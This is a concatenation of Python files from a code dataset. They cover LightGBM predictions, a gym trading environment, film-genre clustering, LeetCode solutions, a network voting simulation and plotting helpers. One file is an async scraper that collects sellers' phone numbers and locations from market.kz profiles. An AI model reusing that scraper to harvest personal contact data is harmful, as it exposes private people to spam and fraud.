'bagging_fraction': 0.95,\r\n    'bagging_freq': 1,\r\n    'bagging_seed': 1,\r\n    'feature_fraction': 0.9,\r\n    'feature_fraction_seed': 1,\r\n    'max_bin': 50,\r\n    'max_depth': 25,\r\n    'num_rounds': 200,\r\n    'metric' : 'auc'\r\n    }\r\n\r\n#%time \r\nmodel_f2 = lgb.train(params, train_set=d_train, valid_sets=d_val, verbose_eval=5)\r\nm2_feature_importance=pd.DataFrame(model_f2.feature_importance(),index=train.columns)\r\n###\r\n'''\r\nparams = {\r\n    'objective': 'binary',\r\n    \r\n    'boosting': 'rf',\r\n    'learning_rate':0.22,\r\n    'lambda_l2': 0.0005,\r\n    'verbose': 0,\r\n    'num_leaves': 800,\r\n    'bagging_fraction': 0.8,\r\n    'bagging_freq': 1,\r\n    'bagging_seed': 1,\r\n    'feature_fraction': 0.85,\r\n    'feature_fraction_seed': 1,\r\n    'max_bin': 50,\r\n    'max_depth': 25,\r\n    'num_rounds': 150,\r\n    'metric' : 'auc'\r\n    }\r\n\r\n#%time \r\nmodel_f3 = lgb.train(params, train_set=d_train,valid_sets=d_val, verbose_eval=5)\r\nm3_feature_importance=pd.DataFrame(model_f3.feature_importance(),index=train.columns)\r\n###\r\nparams = {\r\n    'objective': 'binary',\r\n    \r\n    'boosting': 'goss',\r\n    'learning_rate':0.15,\r\n    'lambda_l2': 0.0005,\r\n    'verbose': 0,\r\n    'num_leaves': 800,\r\n    \r\n    'feature_fraction': 0.9,\r\n    'feature_fraction_seed': 1,\r\n    'max_bin': 50,\r\n    'max_depth': 25,\r\n    'num_rounds': 200,\r\n    'metric' : 'auc'\r\n    }\r\n\r\n#%time \r\nmodel_f4 = lgb.train(params, train_set=d_train,valid_sets=d_val, verbose_eval=5)\r\nm4_feature_importance=pd.DataFrame(model_f4.feature_importance(),index=train.columns)\r\nprint('Making predictions')\r\n'''\r\np_test_1 = model_f1.predict(test)\r\n\r\np_test_2 = model_f2.predict(test)\r\n'''\r\np_test_3 = model_f3.predict(X_test)\r\np_test_4 = model_f4.predict(X_test)\r\n'''\r\np_test_avg = np.mean([p_test_1, p_test_2], axis = 0)\r\n\r\n\r\nprint('Done making predictions')\r\n\r\n
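# write the submission: one (id, target) row per test example, gzip-compressed\r\n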
print ('Saving predictions of the averaged models')\r\n\r\nsubm = pd.DataFrame()\r\nsubm['id'] = ids\r\nsubm['target'] = p_test_avg\r\nsubm.to_csv(data_path + 'submission_lgb_1.3.csv.gz', compression = 'gzip', index=False, float_format = '%.5f')\r\n\r\nprint('Done!')\r\n","sub_path":"output_prediction.py","file_name":"output_prediction.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483623959","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport enum\nimport numpy as np\nimport random\n\nrandom.seed(0)\n\nDEFAULT_COMMISSION_PERC = 0.00\nDEFAULT_WINDOW_SIZE = 300\nPAGE = 0\nTRADIN_INTERVAL = 100\nSHOULD_USE_INTERVAL = False\n\nclass Actions(enum.Enum):\n    Skip = 0\n    Buy = 1\n    Close = 2\n\nclass StocksEnv(gym.Env):\n    metadata = {'render.modes': ['human']}\n\n    def __init__(self, prices, test=False):\n\n        self._test_env = test\n        self._prices = prices\n        self._initial_offset = PAGE * TRADIN_INTERVAL  #random.randint(DEFAULT_WINDOW_SIZE,len(self._prices) - 1)\n        self._offset = self._initial_offset\n        self._window_size = DEFAULT_WINDOW_SIZE\n        self._commission_perc = DEFAULT_COMMISSION_PERC \n\n        self.have_position = False\n        self.open_price = 0\n\n        self.action_space = gym.spaces.Discrete(n=len(Actions))\n        self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(DEFAULT_WINDOW_SIZE,1), dtype=np.float32)\n\n    def reset(self):\n        self._initial_offset = PAGE * TRADIN_INTERVAL  #random.randint(DEFAULT_WINDOW_SIZE,len(self._prices) - 1)\n        self._offset = self._initial_offset \n        self.have_position = False\n        return self.get_state(self._offset,self._window_size + 1)\n\n    def get_state(self, t, n):\n        d = t - n + 1\n        block = self._prices[d : t + 1] if d >= 0 else -d * [self._prices[0]] + self._prices[0 : t + 1]\n        res = []\n\n        for i in range(n - 1):\n            try:\n                res.append(((block[i + 1] - block[i]) / block[i]) * 100 )\n            except:\n                res.append(0)\n        return np.array(res)\n\n    def _cur_close(self):\n        return self._prices[self._offset]\n\n    def _set_seed(self,seed):\n        random.seed(seed)\n\n    def take_action(self,action):\n        reward = 0.0\n        done = False\n        close = self._cur_close()\n        if action == Actions.Buy and not self.have_position:\n            self.have_position = True\n            self.open_price = close\n            reward -= self._commission_perc\n        elif action == Actions.Close and self.have_position:\n            reward -= self._commission_perc\n            reward += 100.0 * (close - self.open_price) / self.open_price\n            self.have_position = False\n            self.open_price = 0.0\n\n        self._offset += 1\n        done = self._offset >= len(self._prices) #or (SHOULD_USE_INTERVAL and self._offset >= self._initial_offset + TRADIN_INTERVAL)\n\n        if self._test_env and done:\n            print(\"Total percentage change \" ,((self._prices[-1] - self._prices[self._initial_offset]) / self._prices[self._initial_offset]) * 100)\n\n        # if done:\n        #     print(\"Reward before :\" + str(reward))\n        #     reward -= ((self._prices[self._offset] - self._prices[self._initial_offset]) / self._prices[self._initial_offset]) * 100\n        #     print(\"Reward after :\" + str(reward))\n\n        return reward, done\n\n    def step(self, action_idx):\n        action = Actions(action_idx)\n        reward, done = self.take_action(action)\n        obs = self.get_state(self._offset,self._window_size + 1)\n        info = { \"offset\": self._offset}\n        return obs, reward, done, info\n\n    def render(self, mode='human', close=False):\n        pass\n\n    def close(self):\n        pass\n\n    def seed(self, seed=None):\n        self.np_random, seed1 = seeding.np_random(seed)\n        seed2 = seeding.hash_seed(seed1 
+ 1) % 2 ** 31\n        return [seed1, seed2]\n\n","sub_path":"esba-pytorch-reinforcement/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542752773","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager\nfont = font_manager.FontProperties(fname=\"C:\\\\Windows\\\\Fonts\\\\AdobeFanHeitiStd-Bold.otf\",size='20')\nfrom kmodes.kmodes import KModes\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef main(num, source_data):\n    count=0\n    all_count=[]\n    month_count=[]\n    all_data=[]\n    data_list=[]\n    data_num=[]\n    # print(len(source_data[\"類型\"]))\n    for i in range(len(source_data[\"類型\"])):\n        tmp=datetime.datetime.strptime(source_data[\"上映日期\"][i],\"%Y/%m/%d\")\n        all_data.append(source_data[\"類型\"][i].split('、')) \n        all_count.append(i)\n        if(tmp.month==num):\n            data_list.append(source_data[\"類型\"][i].split('、')) \n            count+=1 \n            month_count.append(i)\n    for i in range(len(data_list)):\n        for j in (data_list[i]):\n            data_num.append(j) \n#    from collections import Counter\n#    print(Counter(data_num))\n    labels=list(set(data_num)) \n    data_count=np.zeros(len(labels))\n    for i in (data_num):\n        for j in range(len(data_count)):\n            if i in list(set(data_num))[j]:\n                data_count[j]+=1\n    return data_count, labels, all_data, count, data_list, month_count, all_count\n\n# data_count, labels, all_data=main(10)\n\ndef kmode(source_data, all_data, data_list, month_count, all_count, clusters_num, init, n_init, verbose, all_option=False):\n    center_list=[]\n    if all_option==False:\n        revenue = source_data.iloc[month_count[0]:month_count[-1]] \n        revenue.pop(\"上映日期\")\n        revenue.pop(\"出品\")\n        revenue.pop(\"google trend\")\n        revenue.pop(\"導演\")\n        revenue.pop(\"演員1\")\n        revenue.pop(\"演員2\")\n        revenue.pop(\"演員3\")\n        revenue.pop(\"演員4\")\n        revenue.pop(\"編劇\")\n        revenue.pop(\"喜歡\")\n        revenue.pop(\"不喜歡\")\n        revenue.pop(\"製片預算\")\n        revenue=revenue.nlargest(7, [\"累計銷售金額\"]) \n        print(revenue.to_string(index=False))\n        for i in (data_list):\n            if len(i)!=5:\n                a=5-len(i) \n                for j in range(a): \n                    i.append(\"no\") \n        data_array=np.array(data_list)\n    else:\n        revenue = source_data.iloc[all_count[0]:all_count[-1]]\n        revenue.pop(\"上映日期\")\n        revenue.pop(\"出品\")\n        revenue.pop(\"google trend\")\n        revenue.pop(\"導演\")\n        revenue.pop(\"演員1\")\n        revenue.pop(\"演員2\")\n        revenue.pop(\"演員3\")\n        revenue.pop(\"演員4\")\n        revenue.pop(\"編劇\")\n        revenue.pop(\"喜歡\")\n        revenue.pop(\"不喜歡\")\n        revenue.pop(\"製片預算\")\n        revenue=revenue.nlargest(7, [\"累計銷售金額\"]) \n        print(revenue.to_string(index=False))\n        for i in (all_data):\n            if len(i)!=5:\n                a=5-len(i) \n                for j in range(a): \n                    i.append(\"no\")\n        data_array=np.array(all_data) \n\n    km = KModes(n_clusters=clusters_num, init=init, n_init=n_init, verbose=verbose)\n    clusters = km.fit_predict(data_array)\n    \n    \"\"\"\n    Print the cluster centroids\n    \"\"\" \n#    print(km.cluster_centroids_)\n    for i in range(clusters_num):\n        if km.cluster_centroids_[i][1]==\"no\":\n            center_list.append(km.cluster_centroids_[i][0])\n        else:\n            center_list.append(km.cluster_centroids_[i][0]+km.cluster_centroids_[i][1])\n\n    return center_list, clusters\n\n\n# center_list, clusters=kmode(all_data, clusters_num=7, init='Huang', n_init=5, verbose=1) \n\n\ndef pie(num, source_data, all_option=True):\n    if all_option==False:\n        for ii in range(num):\n            if ii==0:\n                pass\n            else: \n                data_count, labels, all_data, count, data_list, month_count, 
all_count=main(ii,source_data=source_data)\n                print(\"month_\"+str(ii)+\":\")\n                print(\"movie number:\",count)\n                print(\"class number:\",data_count)\n                center_list, clusters=kmode(source_data,all_data, data_list, month_count, all_count, clusters_num=7, init='Huang', n_init=5, verbose=1, all_option=False) \n                print(\"cluster center:\",center_list)\n                print(\"class:\",clusters)\n                check_labels=np.zeros(len(center_list))\n                for i in range(len(center_list)):\n                    check_labels[i]=i\n                print(check_labels) \n\n                # from collections import Counter\n                # print(Counter(clusters))\n\n                plot_data=np.zeros(len(center_list))\n                for i in clusters:\n                    for j in range(len(check_labels)):\n                        # print(check_labels[j])\n                        if i == check_labels[j]:\n                            plot_data[i]+=1 \n                print(plot_data) \n\n                plt.figure(figsize=(12,18))    # set the figure frame size\n#                labels = check_labels    # category labels for the pie chart\n                labels = center_list\n                # separeted = (0, 0, 0.3, 0, 0.3)    # choose which wedges to explode, per category\n                # size = accident[\"count\"]    # numeric source for the pie chart\n\n                patches,l_text,p_text =plt.pie(plot_data,    # values\n                        labels = labels,    # labels\n                        autopct = \"%1.1f%%\",    # show percentages to one decimal place\n                        # explode = separeted,    # positions of the exploded wedges\n                        pctdistance = 0.6,    # distance of the numbers from the center\n                        textprops = {\"fontsize\" : 24},    # text size\n                        shadow=True)    # add a shadow \n                \n                \n                for t in l_text: \n                    t.set_fontproperties(font)\n                month=[\"0\",\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\"]\n                plt.axis('equal')    # keep the pie chart circular\n                plt.title(\"Film Genre Statistics of \"+ month[ii], {\"fontsize\" : 24})    # set the title and its font size\n                plt.legend(loc = \"best\", prop=font)    # place the legend at the best position\n#                plt.savefig(\"Film Genre Statistics of \"+ month[ii]+\".jpg\",    # save the figure\n#                            bbox_inches='tight',    # trim the space taken by the axes\n#                            pad_inches=0.0)    # remove all white margins\n#                plt.close()    # close the figure\n    else:\n        data_count, labels, all_data, count, data_list, month_count, all_count=main(0,source_data=source_data)\n        print(\"All:\")\n#        print(\"movie number:\",count)\n#        print(\"class number:\",data_count) \n\n        center_list, clusters=kmode(source_data,all_data, data_list, month_count, all_count, clusters_num=7, init='Huang', n_init=5, verbose=1, all_option=True) \n        print(\"cluster center:\",center_list)\n        print(\"class:\",clusters)\n        print(len(clusters))\n        check_labels=np.zeros(len(center_list))\n        for i in range(len(center_list)):\n            check_labels[i]=i\n        print(check_labels) \n        dataframe=pd.DataFrame(clusters, columns=['新類別'])\n#        print(dataframe)\n        class_data=pd.concat([source_data,dataframe],axis=1, ignore_index=False)\n#        print(class_data)\n        plot_data=np.zeros(len(center_list))\n        for i in clusters:\n            for j in range(len(check_labels)):\n                # print(check_labels[j])\n                if i == check_labels[j]:\n                    plot_data[i]+=1 \n#        print(plot_data) \n\n        plt.figure(figsize=(12,18))    # set the figure frame size\n#        labels = check_labels    # category labels for the pie chart\n        labels = center_list\n        # separeted = (0, 0, 0.3, 0, 0.3)    # choose which wedges to explode, per category\n        # size = accident[\"count\"]    # numeric source for the pie chart\n\n        patches,l_text,p_text =plt.pie(plot_data,    # values\n                labels = labels,    # labels\n                autopct = \"%1.1f%%\",    # show percentages to one decimal place\n                # explode = separeted,    # positions of the exploded wedges\n                pctdistance = 0.6,    # distance of the numbers from the center\n                textprops = {\"fontsize\" : 24},    # text size\n                shadow=True\n                )    # add a shadow\n\n        for t in l_text: \n            t.set_fontproperties(font)\n        plt.axis('equal')    # keep the pie chart circular\n        plt.title(\"Annual Film Genre Statistics\", {\"fontsize\" : 24})    # set the title and its font size \n        plt.legend(loc = \"best\",prop=font)    # place the legend at the best position\n        plt.show()\n#        plt.savefig(\"Annual Film Genre Statistics.jpg\",    # save the figure\n#                    bbox_inches='tight',    # trim the space taken by the axes\n#                    pad_inches=0.0)    # remove all white margins\n#        plt.close()    # close the figure\n    return class_data\n\n# class_data=pie(num=11, 
all_option=True)","sub_path":"class_method.py","file_name":"class_method.py","file_ext":"py","file_size_in_byte":9690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"147080909","text":"import asyncio\nimport aiohttp\nfrom datetime import date, timedelta\nfrom bs4 import BeautifulSoup as BS\nimport re\nimport pickle\nimport os\n\n\n\"\"\"\nVariables\n\"\"\"\nURL = \"https://market.kz\"\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'\n}\n\"\"\"\nFor sitemap\n\"\"\"\ncategories = (\n ('detyam', 'Детям'),\n ('zhivotnye', 'Животные'),\n ('elektronika', 'Электроника'),\n ('dom-dacha', 'Для дома и дачи'),\n ('uslugi', 'Услуги'),\n ('hobby-otdyh', 'Хобби и отдых'),\n ('lichnye-vezchi', 'Личные вещи'),\n ('rabota', 'Работа'),\n ('biznes', 'Для бизнеса'),\n ('ruchnaya-rabota', 'Ручная работа'),\n ('transport', 'Транспорт'),\n ('nedvizhimost', 'Недвижимость')\n)\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n\nhours = [str(i).zfill(2) for i in range(0, 1)]\ntoday = date.today()\ndates = [(today - timedelta(days=x)).strftime('%Y/%m/%d') for x in range(0, 30)]\n\nDATEPATTERN = re.compile(r'(\\d+)/(\\d+)/(\\d+)')\nNUMERICPATTERN = re.compile(r'\\D')\n\n\"\"\"\nGlobal var\n\"\"\"\nusers_list = set()\n\"\"\"\nuser type:\n{\n name: username\n phones: [phones]\n location: location\n}\n\"\"\"\nusers_info = [] # not used\n\n\ndef url_maker(category, dt, hour):\n return \"/\".join([URL, 'sitemap', category, dt, hour]) + \"/\"\n\n\ndef url_advert(ad):\n return \"\".join([URL, ad])\n\n\ndef date_snake(dt):\n d, m, y = DATEPATTERN.match(dt).groups()\n return \"{}_{}_{}\".format(d, m, y)\n\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n return await response.text()\n\n\nasync def word_parser(url, words):\n async with aiohttp.ClientSession(headers=headers) as session:\n html = await fetch(session, url)\n advert_soup = BS(html, \"html.parser\")\n item = advert_soup.find('div', {'id': 'content'})\n item_title = item.find('h1', {'itemprop': 'name'}).text\n item_text = item.find('p', {'itemprop': 'description'})\n item_text = item_text.text if item_text else ''\n if item.has_attr('data-current-category'):\n item_category = item['data-current-category']\n else:\n item_category = None\n item_price_container = item.find('dl', {'class': 'price'})\n item_price = item_price_container.find('dd').text\n price = NUMERICPATTERN.sub('', item_price)\n if len(price) > 0:\n price = int(price)\n else:\n price = None\n user_link = item.find('div', {'class': 'advert-owner__name'}).a['href']\n username = user_link.split('/')[2]\n if username not in users_list:\n users_list.add(username)\n user = await get_user(username)\n else:\n user = username\n words.append({\n 'title': item_title,\n 'text': item_text,\n 'url': url,\n 'category': item_category,\n 'price': price,\n 'user': user\n })\n\n\nasync def get_user(user):\n url = url_advert(\"/profile/{}/\".format(user))\n async with aiohttp.ClientSession(headers=headers) as session:\n html = await fetch(session, url)\n soup = BS(html, \"html.parser\")\n profile = soup.find('div', {'class': 'profile-info'})\n contact_info = profile.find('div', {'class': 'contact-info'})\n location = contact_info.p.span.text if contact_info.p.span else None\n contacts_box = profile.find('div', {'class': 'contacts'})\n contacts = contacts_box.dl.dd.find_all('span', {'class': 'phones'}) if contacts_box.dl else []\n numbers = 
[]\n    for contact in contacts:\n        numbers.append(contact.text)\n    user = {\n        'name': user,\n        'phones': numbers,\n        'location': location\n    }\n    return user\n\n\nasync def hours_parser(category, dt, hour, words):\n    url = url_maker(category, dt, hour)\n    async with aiohttp.ClientSession(headers=headers) as session:\n        html = await fetch(session, url)\n        soup = BS(html, \"html.parser\")\n        links_container = soup.find('div', {'class': 'inline-links'})\n        links = links_container.find_all('a', href=True) if links_container else None\n        if links:\n            parsers = [asyncio.ensure_future(word_parser(url_advert(link['href']), words)) for link in links]\n            await asyncio.wait(parsers)\n\n\nasync def days_parser(category_name, dt):\n    words = []\n    filename = os.path.join('categories', category_name, \"{}.pickle\".format(date_snake(dt)))\n    os.makedirs(os.path.dirname(filename), exist_ok=True)\n    if not os.path.isfile(filename):\n        print(\"FETCHING {} date {}\".format(category_name, dt))\n        tasks = [asyncio.ensure_future(hours_parser(category_name, dt, i, words)) for i in hours]\n        await asyncio.wait(tasks)\n        with open(filename, 'wb') as fp:\n            pickle.dump(words, fp)\n            fp.close()\n\n\nasync def category_task(category_name):\n    tasks = [asyncio.ensure_future(days_parser(category_name, dt)) for dt in dates]\n    await asyncio.wait(tasks)\n    print(\"COMPLETE {}\".format(category_name))\n\n\nasync def run_tasks():\n    # load users that have already been parsed\n    for cat, _ in categories:\n        files_list = os.listdir(os.path.join(THIS_FOLDER, 'categories', cat))\n        for file in files_list:\n            filename = os.path.join(THIS_FOLDER, 'categories', cat, file)\n            if os.path.isfile(filename):\n                with open(filename, 'rb') as f:\n                    adverts = pickle.load(f)\n                    for advert in adverts:\n                        if advert['user']:\n                            if isinstance(advert['user'], dict):\n                                users_list.add(advert['user']['name'])\n                            else:\n                                users_list.add(advert['user'])\n    tasks = [asyncio.ensure_future(category_task(i)) for i, n in categories]\n    await asyncio.wait(tasks)\n\n\nif __name__ == \"__main__\":\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(run_tasks())\n    loop.close()\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18372964","text":"'''\nGiven an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nExample:\n\nInput: [0,1,0,3,12]\nOutput: [1,3,12,0,0]\nNote:\n\nYou must do this in-place without making a copy of the array.\nMinimize the total number of operations.\n'''\n\nclass Solution(object):\n    def moveZeroes(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: None Do not return anything, modify nums in-place instead.\n        \"\"\"\n        z_pointer = 0\n        non_z_pointer = 0\n        # i = 0\n        while z_pointer < len(nums) and non_z_pointer < len(nums):\n            # i += 1\n        # for i in range(len(nums)):\n            try:\n                if nums[non_z_pointer] == 0:\n                    non_z_pointer += 1\n                if nums[z_pointer] != 0:\n                    z_pointer += 1\n                if nums[non_z_pointer] != 0 and nums[z_pointer] == 0 and (non_z_pointer > z_pointer):\n                    nums[non_z_pointer], nums[z_pointer] = nums[z_pointer], nums[non_z_pointer]\n                    non_z_pointer += 1\n                    z_pointer += 1\n                elif nums[non_z_pointer] != 0 and nums[z_pointer] == 0 and (non_z_pointer < z_pointer): # feels like these condition checks could be made shorter\n                    non_z_pointer += 1\n            except IndexError:\n                break\n        # print(i)\n\nnums = [0,1,0,3,12]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [0,0,1]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = 
[0,0,0,1,2,3,0,0]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [1,0]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [1,0,1]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\n\n# https://leetcode.com/problems/move-zeroes/discuss/563197/Python-simple-solution-Faster-than-73.17\nclass Solution:\n    def moveZeroes(self, nums: List[int]) -> None:\n        first_zero = 0\n        for i in range(0, len(nums)):\n            if nums[i] != 0:\n                nums[first_zero], nums[i] = nums[i], nums[first_zero]\n                first_zero += 1\n\n\n# https://leetcode.com/explore/other/card/30-day-leetcoding-challenge/528/week-1/3286/discuss/562750/Python-O(n)-solution\nclass Solution:\n    def moveZeroes(self, nums: List[int]) -> None:\n        first_zero_index = -1\n        for i in range(len(nums)):\n            if nums[i] == 0 and first_zero_index == -1:\n                first_zero_index = i\n            if nums[i] != 0 and first_zero_index != -1:\n                nums[i], nums[first_zero_index] = nums[first_zero_index], nums[i]\n                first_zero_index = first_zero_index + 1","sub_path":"leetcode/30 days challenge/04. Move Zeroes.py","file_name":"04. Move Zeroes.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330889399","text":"#Author: Roberto Kenji Hiramatsu\n#Support for copying files via pscp\n#Date: 2016-09-04\n\nfrom subprocess import call\nimport os,sys\n\ndef copia(ident,desti=\"D:\\\\temp\\\\teste4\",pastaOri=\"/home/yakumo/openface/huawei/usputil/video4\"):\n\tnident = int(ident)\n\tcaminho = \"{}/*_i{:04d}_*\".format(pastaOri,nident)\n\torige=\"yakumo@localhost:{}\".format(caminho)\n\tcall([\"pscp\",\"-P\",\"4722\",\"-i\",\"C:\\\\Users\\\\kenji\\\\face.ppk\",orige,desti])\n\ndef pastaOk(desti=\"D:\\\\temp\\\\teste4\\\\\"):\n\tif os.path.exists(desti):\n\t\tif os.path.isdir(desti):\n\t\t\treturn True\n\telse:\n\t\tos.mkdir(desti)\n\t\treturn True\n\treturn False\n","sub_path":"Linux/Python/usputil/video/externoexec4.py","file_name":"externoexec4.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399157599","text":"import logging\nimport os\nimport subprocess\nimport time\n\nfrom MySQLdb import connect\n\nimport manage\nfrom minicms.settings import DATABASES\n\nlogger = logging.getLogger(__name__)\ntry:\n    dbinfo = DATABASES['default']\n    dbname = dbinfo['NAME']\n    while True:\n        try:\n            conn = connect(\n                host=dbinfo['HOST'],\n                user=dbinfo['USER'],\n                password=dbinfo['PASSWORD']\n            )\n            break\n        except Exception as e:\n            logger.error(e)\n            time.sleep(2)\n    try:\n        cs = conn.cursor()\n        cs.execute(r\"CREATE DATABASE `%s` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci\" % dbname)\n    except Exception as e:\n        logger.error(e)\n    if subprocess.run([\"python\", \"manage.py\", \"sqldiff\", \"-a\"]).returncode != 0:\n        manage.main([\"manage.py\", \"makemigrations\", \"--check\"])\n        manage.main([\"manage.py\", \"migrate\"])\nexcept Exception as e:\n    logger.error(e)\nfinally:\n    listen_addr = os.getenv('LISTEN_ADDR', '0.0.0.0')\n    listen_port = os.getenv('LISTEN_PORT', '8000')\n\n    manage.main([\"manage.py\", \"runserver\", \"%s:%s\" % (listen_addr, listen_port)])\n","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355332577","text":"from typing import Sized\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nfile=\"graph1.txt\"\n#file=\"graph2.txt\"\n\nG = 
nx.read_edgelist(file,create_using=nx.Graph(), nodetype = int)\n\n#Build the graph with the properties\ncountA=0\ncountB=0\ncountU=0\nlist=[] # (node,degree)\n\n\n\nfor i in G.nodes():\n    \n    if (i%10==0) or (i%10==1)or (i%10==2)or (i%10==3):\n        G.add_node(i,vote=\"A\",degree=G.degree(i)) # look up how to set the size\n        list.append((i,G.degree(i))) # to finish\n        countA+=1\n    elif (i%10==4) or (i%10==5) or (i%10==6) or (i%10==7):\n        G.add_node(i,vote=\"B\",degree=G.neighbors(i))\n        list.append((i,G.degree(i)))\n        countB+=1\n    else:\n        G.add_node(i,vote=\"U\",degree=G.neighbors(i))\n        list.append((i,G.degree(i)))\n        countU+=1\n\n# sorting\nlist.sort(reverse=True,key=lambda a: (a[1],-a[0]))\n\nlist2=list[:21]\nprint(list2)\n\n\n# Function that decides how a node votes \ndef vote(n):\n    voteN=\"U\"\n    countAf=0\n    countBf=0\n\n    for i in G.neighbors(n):\n        if G.nodes[i]['vote']==\"A\":\n            countAf+=1\n        elif G.nodes[i]['vote']==\"B\":\n            countBf+=1\n    \n    if countAf>countBf:\n        voteN=\"A\"\n    elif countBf>countAf:\n        voteN=\"B\"\n\n    return voteN\n\n\nfor x in range(len(list2)):\n    # Reset the graph\n    countAaux=0\n    countBaux=0\n    countUaux=0\n\n    for n in G.nodes():\n        if (n%10==0) or (n%10==1)or (n%10==2)or (n%10==3):\n            G.nodes[n]['vote']=\"A\"\n            countAaux+=1\n        elif (n%10==4) or (n%10==5) or (n%10==6) or (n%10==7):\n            G.nodes[n]['vote']=\"B\"\n            countBaux+=1\n        else:\n            G.nodes[n]['vote']=\"U\"\n            countUaux+=1\n\n    #iterations\n    print(\"--------------------------------------------- x: \",x)\n\n    hasU=True\n    iteration=-1\n    countU=-1\n\n    print(\"list2[x]: \",list2[x])\n\n\n    for j in range(x):\n        G.nodes[list2[j][0]]['vote']=\"A\"\n\n\n    # Run the cycle while someone is still deciding how to vote\n    while hasU:\n        iteration+=1\n        hasU=False\n        countUanterior=countU\n        countA=0\n        countB=0\n        countU=0\n        list3=[]\n\n        # search for new voters\n        for i in G.nodes():\n            if (G.nodes[i]['vote']==\"U\"):\n                hasU=True\n                countU+=1\n                list3.append((i,vote(i)))\n                #G.nodes[i]['vote']=vote(i)\n            elif G.nodes[i]['vote']==\"A\":\n                countA+=1\n            elif G.nodes[i]['vote']==\"B\":\n                countB+=1\n\n\n        #Apply the votes decided in this round\n        for i in list3:\n            G.nodes[i[0]]['vote']=i[1]\n        \n        #if no one else wants to vote\n        if countU==countUanterior:\n            break \n\n    # show results\n    print(\"iteration: \",iteration)\n    print(\"countA: \",countA)\n    print(\"countB: \",countB)\n    print(\"countU: \",countU)\n    print(\"Diff: \",countB-countA)\n\n","sub_path":"HW#3/2c).py","file_name":"2c).py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"90928620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 21 16:25:53 2016\n\n@author: Xin\n#calculate fields PDF \n\"\"\"\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nh5file = h5py.File('conver.h5','r+')\n#rng = np.random.RandomState(10) # deterministic random data\n#a = np.hstack((rng.normal(size=1000),rng.normal(loc=5, scale=2, size=1000)))\n#b=10*np.random.randn(10) \n#plt.hist(b, bins='auto') # plt.hist passes its arguments to np.histogram\n#plt.title(\"Histogram with 'auto' bins\")\n#plt.show()\n\n#plt.plot(x, norm.pdf(x),'r-', lw=5, alpha=0.6, label='norm pdf')\n\n\n\n#specify rerun_tag\nistep='174000'\nnorm_const = 1.0/0.2874\nlarge_label = '$\\overline {S}_{ij}\\overline{B}_i\\overline{B}_j$'\nsmall_label = '${S}_{ij}{B}_i{B}_j-\\overline {S}_{ij}\\overline{B}_i\\overline{B}_j$'\n\n\n\ndef init(istep):\n    delimiter = ''\n    mylist = ['Fields/','P60converion','/',istep]\n    filepath = delimiter.join(mylist)\n    databk = 
h5file.get(filepath)\n large_data = np.array(databk)\n\n mylist = ['diff/','P','/',istep]\n filepath = delimiter.join(mylist)\n databk = h5file.get(filepath)\n small_data = np.array(databk)\n\n return large_data, small_data\n\n\n\ndef visuliz(istep, data, norm_const, scale):\n \n data_2d = norm_const*data[:,:,0]\n plt.figure(1, figsize = (2.6,2.6), dpi=600)\n plt.rc('font', family='Helvetica', size=3)\n plt.imshow(data_2d, origin='none', aspect=1,\n cmap='coolwarm',vmin=-scale,vmax=scale)\n plt.colorbar()\n plt.tight_layout()\n plt.axis('off')\n plt.savefig('vis.pdf', bbox_inches='tight')\n plt.clf()\n \n\n\ndef hist(data, norm_const, xlabel):\n plt.clf()\n data = data.reshape(data.shape[0]*data.shape[1]*data.shape[2])\n data = norm_const*data\n\n plt.hist(data, bins=500, density='True',histtype='step', log='True') \n plt.ylim((1E-8, 2*10))\n plt.xlim((-1000, 1000))\n plt.xlabel(xlabel, fontsize=10, color='black', fontname=\"Helvetica\")\n\n fig = plt.gcf()\n fig.set_size_inches(2.6, 2.6)\n plt.tight_layout()\n mean = np.around(np.mean(data), decimals=2)\n plt.axvline(x=np.mean(data),color='r')\n ax = fig.add_subplot(111)\n ax.annotate('mean\\n='+str(mean), xy=(mean, 1), xytext=(mean+20, 0.5),\n arrowprops=dict(arrowstyle=\"->\"))\n\n delimiter = ''\n titlelist = ['pdf.eps']\n 